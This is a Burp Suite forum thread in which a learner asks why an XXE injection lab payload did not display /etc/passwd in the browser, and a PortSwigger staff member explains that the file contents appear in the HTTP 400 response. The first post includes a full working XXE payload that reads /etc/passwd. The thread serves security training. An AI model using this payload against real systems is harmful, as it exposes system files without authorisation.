Burp Suite User Forum

Error in XXE Injection Lab

Elliot | Last updated: Mar 25, 2020 12:17PM UTC

I just came across a problem while attempting the first XXE Injection lab. In the first lab, you have to define an entity and use it to retrieve the /etc/passwd file. I submitted the following payload: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> But I don't get the /etc/passwd file. I checked the solution and I'm sure I'm doing everything correctly (well, I think). The part that confuses me the most is the fact that I still solved the lab :/ What exactly am I doing wrong here?

Michelle, PortSwigger Agent | Last updated: Mar 25, 2020 02:56PM UTC

Did you intercept the response so you could analyze it in Burp?

Elliot | Last updated: Mar 26, 2020 11:51AM UTC

Sorry for the late reply; I analyzed the response in burp and it worked. I wasn't aware it wouldn't work in the browser. Why's that though?

Michelle, PortSwigger Agent | Last updated: Mar 26, 2020 01:36PM UTC

The web page you see in your browser is designed so that if the HTTP response code is anything other than 200 OK it will not be displayed as part of the page you see in your browser, you will just see the message "Could not fetch stock levels!" If you look at the response when you perform 'Check stock' for an item and have not edited it you'll see the request is a 200 OK response, so the stock level displays in your browser. When you insert the external entity definition, the response is an HTTP 400 Bad Request, so the page in your browser does not display the information, it displays the message "Could not fetch stock levels!". When you analyze the HTTP 400 response though you can see the /etc/passwd file contents.

You need to Log in to post a reply. Or register here, for free.